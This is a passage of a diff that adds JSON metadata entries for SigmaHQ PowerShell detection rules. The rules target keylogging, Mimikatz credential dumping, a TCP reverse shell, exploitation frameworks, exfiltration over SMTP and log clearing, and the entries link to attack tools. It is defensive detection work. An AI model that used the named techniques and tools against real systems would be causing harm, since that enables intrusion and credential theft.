[ + "attack.collection", + "attack.t1056.001" + ], + "creation_date": "2021/07/30", + "filename": "posh_ps_keylogging.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_localuser.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + 
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/10/26", + "filename": "posh_ps_mailboxexport_share.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_malicious_commandlets.yml", + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein 
(update)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_malicious_keywords.yml", + "author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ], + "creation_date": "2021/09/21", + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Diagnostics" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ], + "creation_date": "2022/08/19", + "filename": "posh_ps_modify_group_policy_settings.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "uuid": "78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/19", + "filename": "posh_ps_msxml_com.yml", + "author": "frack113, MatilJ", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects 
Commandlet names and arguments from the Nishang exploitation framework", + "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets", + "meta": { + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/05/16", + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "author": "Alec Costello", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream", + "meta": { + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/07/24", + "filename": "posh_ps_ntfs_ads_access.yml", + "author": "Sami Ruohonen", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_office_comobject_registerxll.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/09/28", + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets", + "meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/05/18", + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell calling a credential prompt", + "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/04/09", + "filename": "posh_ps_prompt_credentials.yml", + "author": "John Lambert (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "meta": { + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/10/04", + "filename": "posh_ps_psasyncshell.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, 
+ { + "description": "Detects the use of PSAttack PowerShell hack tool", + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_psattack.yml", + "author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/06", + "filename": "posh_ps_remote_session_creation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/15", + "filename": "posh_ps_remove_item_path.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_request_kerberos_ticket.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "uuid": 
"42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/10", + "filename": "posh_ps_root_certificate_installed.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ], + "creation_date": "2022/02/01", + "filename": "posh_ps_run_from_mount_diskimage.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of 
security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2021/12/16", + "filename": "posh_ps_security_software_discovery.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2022/09/26", + "filename": "posh_ps_send_mailmessage.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" 
+ ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect adversaries enumerate sensitive files", + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/09/16", + "filename": "posh_ps_sensitive_file_discovery.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/10/20", + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Base64 encoded Shellcode", + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/11/17", + "filename": "posh_ps_shellcode_b64.yml", + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets", + "meta": { + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/08/09", + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ], 
+ "creation_date": "2020/10/16", + "filename": "posh_ps_software_discovery.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/09/02", + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + 
"filename": "posh_ps_susp_ad_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear", + "meta": { + "refs": [ + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ], + "creation_date": "2022/09/12", + "filename": "posh_ps_susp_clear_eventlog.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_directory_enum.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be 
used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/01/02", + "filename": "posh_ps_susp_execute_batch_script.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/04/23", + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "author": "Florian Roth", + "level": "high", + 
